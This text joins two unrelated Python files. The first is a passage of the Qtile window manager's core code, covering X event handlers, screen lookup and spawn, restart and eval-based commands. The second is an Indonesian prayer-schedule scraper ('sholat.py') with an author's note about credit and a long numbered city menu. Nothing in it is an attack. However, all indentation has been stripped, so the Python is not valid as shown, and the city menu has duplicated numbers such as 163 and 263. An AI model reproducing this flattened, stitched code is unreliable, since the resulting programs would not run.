# another event in the queue notifying us to clean it up.
#
# We have to catch these here, because when we .flush() is when xcb
# reports checked exceptions.
except (WindowError, AccessError, DrawableError):
pass
def loop(self):
self.server.start()
self._eventloop.add_signal_handler(signal.SIGINT, self._eventloop.stop)
self._eventloop.add_signal_handler(signal.SIGTERM, self._eventloop.stop)
self._eventloop.set_exception_handler(
lambda x, y: self.log.exception("Got an exception in poll loop"))
self.log.info('Adding io watch')
fd = self.conn.conn.get_file_descriptor()
self._eventloop.add_reader(fd, self._xpoll)
try:
self._eventloop.run_forever()
finally:
self.server.close()
self.log.info('Removing io watch')
self._eventloop.remove_reader(fd)
self._eventloop.close()
self.conn.conn.disconnect()
try:
from gi.repository import GObject
GObject.idle_add(lambda: None)
except ImportError:
pass
def find_screen(self, x, y):
"""
Find a screen based on the x and y offset.
"""
result = []
for i in self.screens:
if x >= i.x and x <= i.x + i.width and \
y >= i.y and y <= i.y + i.height:
result.append(i)
if len(result) == 1:
return result[0]
return None
def find_closest_screen(self, x, y):
"""
If find_screen returns None, then this basically extends a
screen vertically and horizontally and see if x,y lies in the
band.
Only works if it can find a SINGLE closest screen, else we
revert to _find_closest_closest.
Useful when dragging a window out of a screen onto another but
having leftmost corner above viewport.
"""
normal = self.find_screen(x, y)
if normal is not None:
return normal
x_match = []
y_match = []
for i in self.screens:
if x >= i.x and x <= i.x + i.width:
x_match.append(i)
if y >= i.y and y <= i.y + i.height:
y_match.append(i)
if len(x_match) == 1:
return x_match[0]
if len(y_match) == 1:
return y_match[0]
return self._find_closest_closest(x, y, x_match + y_match)
def _find_closest_closest(self, x, y, candidate_screens):
"""
if find_closest_screen can't determine one, we've got multiple
screens, so figure out who is closer. We'll calculate using
the square of the distance from the center of a screen.
Note that this could return None if x, y is right/below all
screens (shouldn't happen but we don't do anything about it
here other than returning None)
"""
closest_distance = None
closest_screen = None
if not candidate_screens:
# try all screens
candidate_screens = self.screens
# if left corner is below and right of screen
# it can't really be a candidate
candidate_screens = [
s for s in candidate_screens
if x < s.x + s.width and y < s.y + s.width
]
for s in candidate_screens:
middle_x = s.x + s.width / 2
middle_y = s.y + s.height / 2
distance = (x - middle_x) ** 2 + (y - middle_y) ** 2
if closest_distance is None or distance < closest_distance:
closest_distance = distance
closest_screen = s
return closest_screen
def handle_SelectionNotify(self, e):
if not getattr(e, "owner", None):
return
name = self.conn.atoms.get_name(e.selection)
self.selection[name]["owner"] = e.owner
self.selection[name]["selection"] = ""
self.convert_selection(e.selection)
hook.fire("selection_notify", name, self.selection[name])
def convert_selection(self, selection, _type="UTF8_STRING"):
TYPE = self.conn.atoms[_type]
self.conn.conn.core.ConvertSelection(self.selection_window.wid,
selection,
TYPE, selection,
xcffib.CurrentTime)
def handle_PropertyNotify(self, e):
name = self.conn.atoms.get_name(e.atom)
# it's the selection property
if name in ("PRIMARY", "CLIPBOARD"):
assert e.window == self.selection_window.wid
prop = self.selection_window.get_property(e.atom, "UTF8_STRING")
# If the selection property is None, it is unset, which means the
# clipboard is empty.
value = prop and prop.value.to_utf8() or six.u("")
self.selection[name]["selection"] = value
hook.fire("selection_change", name, self.selection[name])
def handle_EnterNotify(self, e):
if e.event in self.windowMap:
return True
s = self.find_screen(e.root_x, e.root_y)
if s:
self.toScreen(s.index)
def handle_ClientMessage(self, event):
atoms = self.conn.atoms
opcode = event.type
data = event.data
# handle change of desktop
if atoms["_NET_CURRENT_DESKTOP"] == opcode:
index = data.data32[0]
try:
self.currentScreen.setGroup(self.groups[index])
except IndexError:
self.log.info("Invalid Desktop Index: %s" % index)
def handle_KeyPress(self, e):
keysym = self.conn.code_to_syms[e.detail][0]
state = e.state
if self.numlockMask:
state = e.state | self.numlockMask
k = self.keyMap.get((keysym, state & self.validMask))
if not k:
self.log.info("Ignoring unknown keysym: %s" % keysym)
return
for i in k.commands:
if i.check(self):
status, val = self.server.call(
(i.selectors, i.name, i.args, i.kwargs)
)
if status in (command.ERROR, command.EXCEPTION):
self.log.error("KB command error %s: %s" % (i.name, val))
else:
return
def cmd_focus_by_click(self, e):
wnd = e.child or e.root
# Additional option for config.py
# Brings clicked window to front
if self.config.bring_front_click:
self.conn.conn.core.ConfigureWindow(
wnd,
xcffib.xproto.ConfigWindow.StackMode,
[xcffib.xproto.StackMode.Above]
)
if self.windowMap.get(wnd):
self.currentGroup.focus(self.windowMap.get(wnd), False)
self.windowMap.get(wnd).focus(False)
self.conn.conn.core.AllowEvents(xcffib.xproto.Allow.ReplayPointer, e.time)
self.conn.conn.flush()
def handle_ButtonPress(self, e):
button_code = e.detail
state = e.state
if self.numlockMask:
state = e.state | self.numlockMask
k = self.mouseMap.get(button_code)
for m in k:
if not m or m.modmask & self.validMask != state & self.validMask:
self.log.info("Ignoring unknown button: %s" % button_code)
continue
if isinstance(m, Click):
for i in m.commands:
if i.check(self):
if m.focus == "before":
self.cmd_focus_by_click(e)
status, val = self.server.call(
(i.selectors, i.name, i.args, i.kwargs))
if m.focus == "after":
self.cmd_focus_by_click(e)
if status in (command.ERROR, command.EXCEPTION):
self.log.error(
"Mouse command error %s: %s" % (i.name, val)
)
elif isinstance(m, Drag):
x = e.event_x
y = e.event_y
if m.start:
i = m.start
if m.focus == "before":
self.cmd_focus_by_click(e)
status, val = self.server.call(
(i.selectors, i.name, i.args, i.kwargs))
if status in (command.ERROR, command.EXCEPTION):
self.log.error(
"Mouse command error %s: %s" % (i.name, val)
)
continue
else:
val = (0, 0)
if m.focus == "after":
self.cmd_focus_by_click(e)
self._drag = (x, y, val[0], val[1], m.commands)
self.root.grab_pointer(
True,
xcbq.ButtonMotionMask |
xcbq.AllButtonsMask |
xcbq.ButtonReleaseMask,
xcffib.xproto.GrabMode.Async,
xcffib.xproto.GrabMode.Async,
)
def handle_ButtonRelease(self, e):
button_code = e.detail
state = e.state & ~xcbq.AllButtonsMask
if self.numlockMask:
state = state | self.numlockMask
k = self.mouseMap.get(button_code)
for m in k:
if not m:
self.log.info(
"Ignoring unknown button release: %s" % button_code
)
continue
if isinstance(m, Drag):
self._drag = None
self.root.ungrab_pointer()
def handle_MotionNotify(self, e):
if self._drag is None:
return
ox, oy, rx, ry, cmd = self._drag
dx = e.event_x - ox
dy = e.event_y - oy
if dx or dy:
for i in cmd:
if i.check(self):
status, val = self.server.call((
i.selectors,
i.name,
i.args + (rx + dx, ry + dy, e.event_x, e.event_y),
i.kwargs
))
if status in (command.ERROR, command.EXCEPTION):
self.log.error(
"Mouse command error %s: %s" % (i.name, val)
)
def handle_ConfigureNotify(self, e):
"""
Handle xrandr events.
"""
screen = self.currentScreen
if e.window == self.root.wid and \
e.width != screen.width and \
e.height != screen.height:
screen.resize(0, 0, e.width, e.height)
def handle_ConfigureRequest(self, e):
# It's not managed, or not mapped, so we just obey it.
cw = xcffib.xproto.ConfigWindow
args = {}
if e.value_mask & cw.X:
args["x"] = max(e.x, 0)
if e.value_mask & cw.Y:
args["y"] = max(e.y, 0)
if e.value_mask & cw.Height:
args["height"] = max(e.height, 0)
if e.value_mask & cw.Width:
args["width"] = max(e.width, 0)
if e.value_mask & cw.BorderWidth:
args["borderwidth"] = max(e.border_width, 0)
w = xcbq.Window(self.conn, e.window)
w.configure(**args)
def handle_MappingNotify(self, e):
self.conn.refresh_keymap()
if e.request == xcffib.xproto.Mapping.Keyboard:
self.grabKeys()
def handle_MapRequest(self, e):
w = xcbq.Window(self.conn, e.window)
c = self.manage(w)
if c and (not c.group or not c.group.screen):
return
w.map()
def handle_DestroyNotify(self, e):
self.unmanage(e.window)
def handle_UnmapNotify(self, e):
if e.event != self.root.wid:
c = self.windowMap.get(e.window)
if c and getattr(c, "group", None):
try:
c.window.unmap()
c.state = window.WithdrawnState
except xcffib.xproto.WindowError:
# This means that the window has probably been destroyed,
# but we haven't yet seen the DestroyNotify (it is likely
# next in the queue). So, we just let these errors pass
# since the window is dead.
pass
self.unmanage(e.window)
def handle_ScreenChangeNotify(self, e):
hook.fire("screen_change", self, e)
def toScreen(self, n, warp=True):
"""
Have Qtile move to screen and put focus there
"""
if len(self.screens) < n - 1:
return
old = self.currentScreen
self.currentScreen = self.screens[n]
if old != self.currentScreen:
hook.fire("current_screen_change")
self.currentGroup.focus(self.currentWindow, warp)
def moveToGroup(self, group):
"""
Create a group if it doesn't exist and move a windows there
"""
if self.currentWindow and group:
self.addGroup(group)
self.currentWindow.togroup(group)
def _items(self, name):
if name == "group":
return True, list(self.groupMap.keys())
elif name == "layout":
return True, list(range(len(self.currentGroup.layouts)))
elif name == "widget":
return False, list(self.widgetMap.keys())
elif name == "bar":
return False, [x.position for x in self.currentScreen.gaps]
elif name == "window":
return True, self.listWID()
elif name == "screen":
return True, list(range(len(self.screens)))
def _select(self, name, sel):
if name == "group":
if sel is None:
return self.currentGroup
else:
return self.groupMap.get(sel)
elif name == "layout":
if sel is None:
return self.currentGroup.layout
else:
return utils.lget(self.currentGroup.layouts, sel)
elif name == "widget":
return self.widgetMap.get(sel)
elif name == "bar":
return getattr(self.currentScreen, sel)
elif name == "window":
if sel is None:
return self.currentWindow
else:
return self.clientFromWID(sel)
elif name == "screen":
if sel is None:
return self.currentScreen
else:
return utils.lget(self.screens, sel)
def listWID(self):
return [i.window.wid for i in self.windowMap.values()]
def clientFromWID(self, wid):
for i in self.windowMap.values():
if i.window.wid == wid:
return i
return None
def call_soon(self, func, *args):
""" A wrapper for the event loop's call_soon which also flushes the X
event queue to the server after func is called. """
def f():
func(*args)
self.conn.flush()
self._eventloop.call_soon(f)
def call_soon_threadsafe(self, func, *args):
""" Another event loop proxy, see `call_soon`. """
def f():
func(*args)
self.conn.flush()
self._eventloop.call_soon_threadsafe(f)
def call_later(self, delay, func, *args):
""" Another event loop proxy, see `call_soon`. """
def f():
func(*args)
self.conn.flush()
self._eventloop.call_later(delay, f)
def run_in_executor(self, func, *args):
""" A wrapper for running a function in the event loop's default
executor. """
return self._eventloop.run_in_executor(None, func, *args)
def cmd_debug(self):
"""Set log level to DEBUG"""
self.log.setLevel(logging.DEBUG)
self.log.debug('Switching to DEBUG threshold')
def cmd_info(self):
"""Set log level to INFO"""
self.log.setLevel(logging.INFO)
self.log.info('Switching to INFO threshold')
def cmd_warning(self):
"""Set log level to WARNING"""
self.log.setLevel(logging.WARNING)
self.log.warning('Switching to WARNING threshold')
def cmd_error(self):
"""Set log level to ERROR"""
self.log.setLevel(logging.ERROR)
self.log.error('Switching to ERROR threshold')
def cmd_critical(self):
"""Set log level to CRITICAL"""
self.log.setLevel(logging.CRITICAL)
self.log.critical('Switching to CRITICAL threshold')
def cmd_pause(self):
"""Drops into pdb"""
import pdb
pdb.set_trace()
def cmd_groups(self):
"""
Return a dictionary containing information for all groups.
Example:
groups()
"""
return dict((i.name, i.info()) for i in self.groups)
def cmd_list_widgets(self):
"""
List of all addressible widget names.
"""
return list(self.widgetMap.keys())
def cmd_nextlayout(self, group=None):
"""
This method will be deprecated in favor of cmd_next_layout.
Use lazy.next_layout(g) in your config instead.
"""
deprecated(Qtile.cmd_nextlayout.__doc__)
self.cmd_next_layout(group)
def cmd_next_layout(self, group=None):
"""
Switch to the next layout.
:group Group name. If not specified, the current group is assumed.
"""
if group:
group = self.groupMap.get(group)
else:
group = self.currentGroup
group.nextLayout()
def cmd_prevlayout(self, group=None):
"""
This method will be deprecated in favor of cmd_prev_layout.
Use lazy.prev_layout(g) in your config instead.
"""
deprecated(Qtile.cmd_prevlayout.__doc__)
self.cmd_prev_layout(group)
def cmd_prev_layout(self, group=None):
"""
Switch to the prev layout.
:group Group name. If not specified, the current group is assumed.
"""
if group:
group = self.groupMap.get(group)
else:
group = self.currentGroup
group.prevLayout()
def cmd_screens(self):
"""
Return a list of dictionaries providing information on all screens.
"""
lst = []
for i in self.screens:
lst.append(dict(
index=i.index,
group=i.group.name if i.group is not None else None,
x=i.x,
y=i.y,
width=i.width,
height=i.height,
gaps=dict(
top=i.top.geometry() if i.top else None,
bottom=i.bottom.geometry() if i.bottom else None,
left=i.left.geometry() if i.left else None,
right=i.right.geometry() if i.right else None,
)
))
return lst
def cmd_simulate_keypress(self, modifiers, key):
"""
Simulates a keypress on the focused window.
:modifiers A list of modifier specification strings. Modifiers can
be one of "shift", "lock", "control" and "mod1" - "mod5".
:key Key specification.
Examples:
simulate_keypress(["control", "mod2"], "k")
"""
# FIXME: This needs to be done with sendevent, once we have that fixed.
keysym = xcbq.keysyms.get(key)
if keysym is None:
raise command.CommandError("Unknown key: %s" % key)
keycode = self.conn.first_sym_to_code[keysym]
class DummyEv:
pass
d = DummyEv()
d.detail = keycode
try:
d.state = utils.translateMasks(modifiers)
except KeyError as v:
return v.args[0]
self.handle_KeyPress(d)
def cmd_execute(self, cmd, args):
"""
Executes the specified command, replacing the current process.
"""
atexit._run_exitfuncs()
os.execv(cmd, args)
def cmd_restart(self):
"""
Restart qtile using the execute command.
"""
argv = [sys.executable] + sys.argv
if '--no-spawn' not in argv:
argv.append('--no-spawn')
buf = six.BytesIO()
pickle.dump(QtileState(self), buf, protocol=0)
argv = [s for s in argv if not s.startswith('--with-state')]
argv.append('--with-state=' + buf.getvalue().decode())
self.cmd_execute(sys.executable, argv)
def cmd_spawn(self, cmd):
"""
Run cmd in a shell.
Example:
spawn("firefox")
"""
args = shlex.split(cmd)
r, w = os.pipe()
pid = os.fork()
if pid < 0:
os.close(r)
os.close(w)
return pid
if pid == 0:
os.close(r)
# close qtile's stdin, stdout, stderr so the called process doesn't
# pollute our xsession-errors.
os.close(0)
os.close(1)
os.close(2)
pid2 = os.fork()
if pid2 == 0:
os.close(w)
# Open /dev/null as stdin, stdout, stderr
try:
fd = os.open(os.devnull, os.O_RDWR)
except OSError:
# This shouldn't happen, catch it just in case
pass
else:
if fd > 0:
# Again, this shouldn't happen, but we should just check
os.dup2(fd, 0)
os.dup2(fd, 1)
os.dup2(fd, 2)
try:
os.execvp(args[0], args)
except OSError:
pass
os._exit(1)
else:
# Here it doesn't matter if fork failed or not, we just write
# its return code and exit.
os.write(w, str(pid2).encode())
os.close(w)
# sys.exit raises SystemExit, which will then be caught by our
# top level catchall and we'll end up with two qtiles; os._exit
# actually calls exit.
os._exit(0)
else:
os.close(w)
os.waitpid(pid, 0)
# 1024 bytes should be enough for any pid. :)
pid = os.read(r, 1024)
os.close(r)
return int(pid)
def cmd_status(self):
"""
Return "OK" if Qtile is running.
"""
return "OK"
def cmd_sync(self):
"""
Sync the X display. Should only be used for development.
"""
self.conn.flush()
def cmd_to_screen(self, n):
"""
Warp focus to screen n, where n is a 0-based screen number.
Example:
to_screen(0)
"""
return self.toScreen(n)
def cmd_to_next_screen(self):
"""
This method will be deprecated in favor of cmd_next_screen.
Use lazy.next_screen in your config instead.
"""
deprecated(Qtile.cmd_to_next_screen.__doc__)
return self.cmd_next_screen()
def cmd_next_screen(self):
"""
Move to next screen
"""
return self.toScreen(
(self.screens.index(self.currentScreen) + 1) % len(self.screens)
)
def cmd_to_prev_screen(self):
"""
This method will be deprecated in favor of cmd_prev_screen.
Use lazy.prev_screen in your config instead.
"""
deprecated(Qtile.cmd_to_prev_screen.__doc__)
return self.cmd_prev_screen()
def cmd_prev_screen(self):
"""
Move to the previous screen
"""
return self.toScreen(
(self.screens.index(self.currentScreen) - 1) % len(self.screens)
)
def cmd_windows(self):
"""
Return info for each client window.
"""
return [
i.info() for i in self.windowMap.values()
if not isinstance(i, window.Internal)
]
def cmd_internal_windows(self):
"""
Return info for each internal window (bars, for example).
"""
return [
i.info() for i in self.windowMap.values()
if isinstance(i, window.Internal)
]
def cmd_qtile_info(self):
"""
Returns a dictionary of info on the Qtile instance.
"""
return dict(socketname=self.fname)
def cmd_shutdown(self):
"""
Quit Qtile.
"""
self._eventloop.stop()
def cmd_switch_groups(self, groupa, groupb):
"""
Switch position of groupa to groupb
"""
if groupa not in self.groupMap or groupb not in self.groupMap:
return
indexa = self.groups.index(self.groupMap[groupa])
indexb = self.groups.index(self.groupMap[groupb])
self.groups[indexa], self.groups[indexb] = \
self.groups[indexb], self.groups[indexa]
hook.fire("setgroup")
# update window _NET_WM_DESKTOP
for group in (self.groups[indexa], self.groups[indexb]):
for w in group.windows:
w.group = group
def find_window(self, wid):
window = self.windowMap.get(wid)
if window:
if not window.group.screen:
self.currentScreen.setGroup(window.group)
window.group.focus(window, False)
def cmd_findwindow(self, prompt="window", widget="prompt"):
mb = self.widgetMap.get(widget)
if not mb:
self.log.error("No widget named '%s' present." % widget)
return
mb.startInput(
prompt,
self.find_window,
"window",
strict_completer=True
)
def cmd_next_urgent(self):
try:
nxt = [w for w in self.windowMap.values() if w.urgent][0]
nxt.group.cmd_toscreen()
nxt.group.focus(nxt, False)
except IndexError:
pass # no window had urgent set
def cmd_togroup(self, prompt="group", widget="prompt"):
"""
Move current window to the selected group in a propmt widget
prompt: Text with which to prompt user.
widget: Name of the prompt widget (default: "prompt").
"""
if not self.currentWindow:
self.log.warning("No window to move")
return
mb = self.widgetMap.get(widget)
if not mb:
self.log.error("No widget named '%s' present." % widget)
return
mb.startInput(prompt, self.moveToGroup, "group", strict_completer=True)
def cmd_switchgroup(self, prompt="group", widget="prompt"):
def f(group):
if group:
try:
self.groupMap[group].cmd_toscreen()
except KeyError:
self.log.info("No group named '%s' present." % group)
pass
mb = self.widgetMap.get(widget)
if not mb:
self.log.warning("No widget named '%s' present." % widget)
return
mb.startInput(prompt, f, "group", strict_completer=True)
def cmd_spawncmd(self, prompt="spawn", widget="prompt",
command="%s", complete="cmd"):
"""
Spawn a command using a prompt widget, with tab-completion.
prompt: Text with which to prompt user (default: "spawn: ").
widget: Name of the prompt widget (default: "prompt").
command: command template (default: "%s").
complete: Tab completion function (default: "cmd")
"""
def f(args):
if args:
self.cmd_spawn(command % args)
try:
mb = self.widgetMap[widget]
mb.startInput(prompt, f, complete)
except KeyError:
self.log.error("No widget named '%s' present." % widget)
def cmd_qtilecmd(self, prompt="command",
widget="prompt", messenger="xmessage"):
"""
Execute a Qtile command using the client syntax.
Tab completeion aids navigation of the command tree.
prompt: Text to display at the prompt (default: "command: ").
widget: Name of the prompt widget (default: "prompt").
messenger: command to display output (default: "xmessage").
Set this to None to disable.
"""
def f(cmd):
if cmd:
# c here is used in eval() below
c = command.CommandRoot(self) # noqa
try:
cmd_arg = str(cmd).split(' ')
except AttributeError:
return
cmd_len = len(cmd_arg)
if cmd_len == 0:
self.log.info('No command entered.')
return
try:
result = eval('c.%s' % (cmd))
except (
command.CommandError,
command.CommandException,
AttributeError) as err:
self.log.error(err.message)
result = None
if result is not None:
from pprint import pformat
message = pformat(result)
if messenger:
self.cmd_spawn('%s "%s"' % (messenger, message))
self.log.info(result)
mb = self.widgetMap[widget]
if not mb:
self.log.error("No widget named %s present." % widget)
return
mb.startInput(prompt, f, "qsh")
def cmd_addgroup(self, group):
return self.addGroup(group)
def cmd_delgroup(self, group):
return self.delGroup(group)
def cmd_add_rule(self, match_args, rule_args, min_priorty=False):
"""
Add a dgroup rule, returns rule_id needed to remove it
param: match_args (config.Match arguments)
param: rule_args (config.Rule arguments)
param: min_priorty if the rule is added with minimun prioriry(last)
"""
if not self.dgroups:
self.log.warning('No dgroups created')
return
match = Match(**match_args)
rule = Rule(match, **rule_args)
return self.dgroups.add_rule(rule, min_priorty)
def cmd_remove_rule(self, rule_id):
self.dgroups.remove_rule(rule_id)
def cmd_run_external(self, full_path):
def format_error(path, e):
s = """Can't call "main" from "{path}"\n\t{err_name}: {err}"""
return s.format(path=path, err_name=e.__class__.__name__, err=e)
module_name = os.path.splitext(os.path.basename(full_path))[0]
dir_path = os.path.dirname(full_path)
err_str = ""
local_stdout = six.BytesIO()
old_stdout = sys.stdout
sys.stdout = local_stdout
sys.exc_clear()
try:
fp, pathname, description = imp.find_module(module_name, [dir_path])
module = imp.load_module(module_name, fp, pathname, description)
module.main(self)
except ImportError as e:
fp = None
err_str += format_error(full_path, e)
except:
(exc_type, exc_value, exc_traceback) = sys.exc_info()
err_str += traceback.format_exc()
err_str += format_error(full_path, exc_type(exc_value))
finally:
sys.exc_clear()
sys.stdout = old_stdout
if fp:
fp.close()
return local_stdout.getvalue() + err_str
def cmd_hide_show_bar(self, position="all"):
"""
param: position one of: "top", "bottom", "left", "right" or "all"
"""
if position in ["top", "bottom", "left", "right"]:
bar = getattr(self.currentScreen, position)
if bar:
bar.show(not bar.is_show())
self.currentGroup.layoutAll()
else:
self.log.warning(
"Not found bar in position '%s' for hide/show." % position)
elif position == "all":
screen = self.currentScreen
is_show = None
for bar in [screen.left, screen.right, screen.top, screen.bottom]:
if bar:
if is_show is None:
is_show = not bar.is_show()
bar.show(is_show)
if is_show is not None:
self.currentGroup.layoutAll()
else:
self.log.warning("Not found bar for hide/show.")
else:
self.log.error("Invalid position value:%s" % position)
|
sholat.py | # sholat
# karjok pangesty
# created 31, januari 2019 2:18 pm
# updated 25 march 2020 9:14 AM
#-*-coding : utf-8-*-
'''
PLEASE READ FIRST !!!
-----------------------
The code is open source. you can use it to study.
but I really don't want to copy this script but don't include the source of the script (here the case is my repo)
so please respect people's work, however bad it may be.
'Oh my God, the program "just big open source is not segregated, until notice everything"
Who says it ??
author program "big also give notice in each readme or documentation, you wrote the DOC.
yes,
I realized my writing was very messy,
not neat, careless origin, because it is still learning.
but believe me.
This is the result of my efforts.
I made this twice.
made it first, but instead there was a problem, it disappeared. and even then finished 3 days & night to finish.
I sincerely and i made again
the time is almost the same, but this is a little faster because I already know the flow of the code.
so making the program is not easy.
respect, even if it's just writing
'thanks to: blablabla'
I'm sure those who are already pro, definitely consider this rubbish.
it's okay.
I also believe that if it's already a pro, it's not possible to copy "this program.
but you guys are still learning, I'm not sure.
I hope it's useful .
'''
import sys,os, random
import subprocess as sp
import requests
from time import sleep
from time import strftime as tm
from requests import get
from bs4 import BeautifulSoup as bs
from threading import Thread
##############
# color
lgr='\033[90m'
lr= '\033[91m'
lg= '\033[92m'
lw= '\033[97m'
x = '\033[0m'
#ngambil jadwal hari ini
def gettime():
print(lg+'Updating schedule..')
try:
ts = open('.cookie/ts','r').read()
except IOError:
gettown()
ts= open('.cookie/ts','r').read()
if len(ts) == 0:
ts = '83'
try:
r = get('https://www.jadwalsholat.org/adzan/monthly.php?id='+ts)
except requests.exceptions.ConnectionError:
print(lg+'\ nAstaghfirullah .. \ nUkhty forgot to turn on the network'+x)
input(lg+'\ nJust entering')
menu()
b = bs(r.text,'html.parser')
tr= b.find('tr',class_="table_highlight")
with open('.cookie/sc','w') as sc:
kota = b.find('option', attrs={'value':ts})
i= tr.find_all('td')
sc.write(i[0].text+','+i[1].text+','+i[2].text+','+i[5].text+','+i[6].text+','+i[7].text+','+i[8].text+','+kota.text)
sc.close()
def gettown():
print(
lg+"""1. """+lw+"""Ambarawa """+lg+"""78. """+lw+"""Gombong """+lg+"""155. """+lw+"""Mentok """+lg+"""232. """+lw+"""Selong"""+
lg+"""\n2. """+lw+"""Ambon """+lg+"""79. """+lw+"""Gorontalo """+lg+"""163. """+lw+"""Merauke """+lg+"""233. """+lw+"""Semarang"""+
lg+"""\n3. """+lw+"""Amlapura """+lg+"""80. """+lw+"""Gresik """+lg+"""157. """+lw+"""Metro """+lg+"""234. """+lw+"""Sengkang"""+
lg+"""\n4. """+lw+"""Amuntai """+lg+"""81. """+lw+"""Gunung Sit """+lg+"""158. """+lw+"""Meulaboh """+lg+"""235. """+lw+"""Serang"""+
lg+"""\n5. """+lw+"""Argamakmur """+lg+"""82. """+lw+"""Indramayu """+lg+"""159. """+lw+"""Mojokerto """+lg+"""236. """+lw+"""Serui"""+
lg+"""\n6. """+lw+"""Atambua """+lg+"""83. """+lw+"""Jakarta """+lg+"""160. """+lw+"""Muara Buli """+lg+"""237. """+lw+"""Sibolga"""+
lg+"""\n7. """+lw+"""Babo """+lg+"""84. """+lw+"""Jambi """+lg+"""161. """+lw+"""Muara Bung """+lg+"""238. """+lw+"""Sidikalang"""+
lg+"""\n8. """+lw+"""Bagan Siap """+lg+"""85. """+lw+"""Jayapura """+lg+"""162. """+lw+"""Muara Enim """+lg+"""239. """+lw+"""Sidoarjo"""+
lg+"""\n9. """+lw+"""Bajawa """+lg+"""86. """+lw+"""Jember """+lg+"""163. """+lw+"""Muara Tewe """+lg+"""240. """+lw+"""Sigli"""+
lg+"""\n10. """+lw+"""Balige """+lg+"""87. """+lw+"""Jeneponto """+lg+"""164. """+lw+"""Muaro Siju """+lg+"""241. """+lw+"""Singaparna"""+
lg+"""\n11. """+lw+"""Balik Papa """+lg+"""88. """+lw+"""Jepara """+lg+"""165. """+lw+"""Muntilan """+lg+"""242. """+lw+"""Singaraja"""+
lg+"""\n12. """+lw+"""Banda Aceh """+lg+"""89. """+lw+"""Jombang """+lg+"""166. """+lw+"""Nabire """+lg+"""243. """+lw+"""Singkawang"""+
lg+"""\n13. """+lw+"""Bandarlamp """+lg+"""90. """+lw+"""Kabanjahe """+lg+"""167. """+lw+"""Negara """+lg+"""244. """+lw+"""Sinjai"""+
lg+"""\n14. """+lw+"""Bandung """+lg+"""91. """+lw+"""Kalabahi """+lg+"""168. """+lw+"""Nganjuk """+lg+"""245. """+lw+"""Sintang"""+
lg+"""\n15. """+lw+"""Bangkalan """+lg+"""92. """+lw+"""Kalianda """+lg+"""169. """+lw+"""Ngawi """+lg+"""246. """+lw+"""Situbondo"""+
lg+"""\n16. """+lw+"""Bangkinang """+lg+"""93. """+lw+"""Kandangan """+lg+"""170. """+lw+"""Nunukan """+lg+"""247. """+lw+"""Slawi"""+
lg+"""\n17. """+lw+"""Bangko """+lg+"""94. """+lw+"""Karanganya """+lg+"""171. """+lw+"""Pacitan """+lg+"""248. """+lw+"""Sleman"""+
lg+"""\n18. """+lw+"""Bangli """+lg+"""95. """+lw+"""Karawang """+lg+"""172. """+lw+"""Padang """+lg+"""249. """+lw+"""Soasiu"""+
lg+"""\n19. """+lw+"""Banjar """+lg+"""96. """+lw+"""Kasungan """+lg+"""173. """+lw+"""Padang Pan """+lg+"""250. """+lw+"""Soe"""+
lg+"""\n20. """+lw+"""Banjar Bar """+lg+"""97. """+lw+"""Kayuagung """+lg+"""174. """+lw+"""Padang Sid """+lg+"""251. """+lw+"""Solo"""+
lg+"""\n21. """+lw+"""Banjarmasi """+lg+"""98 . """+lw+"""Kebumen """+lg+"""175. """+lw+"""Pagaralam """+lg+"""252. """+lw+"""Solok"""+
lg+"""\n22. """+lw+"""Banjarnega """+lg+"""99. """+lw+"""Kediri """+lg+"""176. """+lw+"""Painan """+lg+"""253. """+lw+"""Soreang"""+
lg+"""\n23. """+lw+"""Bantaeng """+lg+"""100. """+lw+"""Kefamenanu """+lg+"""177. """+lw+"""Palangkara """+lg+"""254. """+lw+"""Sorong"""+
lg+"""\n24. """+lw+"""Banten """+lg+"""101. """+lw+"""Kendal """+lg+"""178. """+lw+"""Palembang """+lg+"""255. """+lw+"""Sragen"""+
lg+"""\n25. """+lw+"""Bantul """+lg+"""102. """+lw+"""Kendari """+lg+"""179. """+lw+"""Palopo """+lg+"""263. """+lw+"""Stabat"""+
lg+"""\n26. """+lw+"""Banyuwangi """+lg+"""103. """+lw+"""Kertosono """+lg+"""180. """+lw+"""Palu """+lg+"""257. """+lw+"""Subang"""+
lg+"""\n27. """+lw+"""Barabai """+lg+"""104. """+lw+"""Ketapang """+lg+"""181. """+lw+"""Pamekasan """+lg+"""258. """+lw+"""Sukabumi"""+
lg+"""\n28. """+lw+"""Barito """+lg+"""105. """+lw+"""Kisaran """+lg+"""182. """+lw+"""Pandeglang """+lg+"""259. """+lw+"""Sukoharjo"""+
lg+"""\n29. """+lw+"""Barru """+lg+"""106. """+lw+"""Klaten """+lg+"""183. """+lw+"""Pangkajene """+lg+"""260. """+lw+"""Sumbawa Be"""+
lg+"""\n30. """+lw+"""Batam """+lg+"""107. """+lw+"""Kolaka """+lg+"""184. """+lw+"""Pangkajene """+lg+"""261. """+lw+"""Sumedang"""+
lg+"""\n31. """+lw+"""Batang """+lg+"""108. """+lw+"""Kota Baru """+lg+"""185. """+lw+"""Pangkalanb """+lg+"""262. """+lw+"""Sumenep"""+
lg+"""\n32. """+lw+"""Batu """+lg+"""109. """+lw+"""Kota Bumi """+lg+"""186. """+lw+"""Pangkalpin """+lg+"""263. """+lw+"""Sungai Lia"""+
lg+"""\n33. """+lw+"""Baturaja """+lg+"""110. """+lw+"""Kota Janth """+lg+"""187. """+lw+"""Panyabunga """+lg+"""264. """+lw+"""Sungai Pen"""+
lg+"""\n34. """+lw+"""Batusangka """+lg+"""111. """+lw+"""Kota Mobag """+lg+"""188. """+lw+"""Pare """+lg+"""265. """+lw+"""Sunggumina"""+
lg+"""\n35. """+lw+"""Baubau """+lg+"""112. """+lw+"""Kuala Kapu """+lg+"""189. """+lw+"""Parepare """+lg+"""266. """+lw+"""Surabaya"""+
lg+"""\n36. """+lw+"""Bekasi """+lg+"""113. """+lw+"""Kuala Kuru """+lg+"""190. """+lw+"""Pariaman """+lg+"""267. """+lw+"""Surakarta"""+
lg+"""\n37. """+lw+"""Bengkalis """+lg+"""114. """+lw+"""Kuala Pemb """+lg+"""191. """+lw+"""Pasuruan """+lg+"""268. """+lw+"""Tabanan"""+
lg+"""\n38. """+lw+"""Bengkulu """+lg+"""115. """+lw+"""Kuala Tung """+lg+"""192. """+lw+"""Pati """+lg+"""269. """+lw+"""Tahuna"""+
lg+"""\n39. """+lw+"""Benteng """+lg+"""116. """+lw+"""Kudus """+lg+"""193. """+lw+"""Payakumbuh """+lg+"""270. """+lw+"""Takalar"""+
lg+"""\n40. """+lw+"""Biak """+lg+"""117. """+lw+"""Kuningan """+lg+"""194. """+lw+"""Pekalongan """+lg+"""271. """+lw+"""Takengon"""+
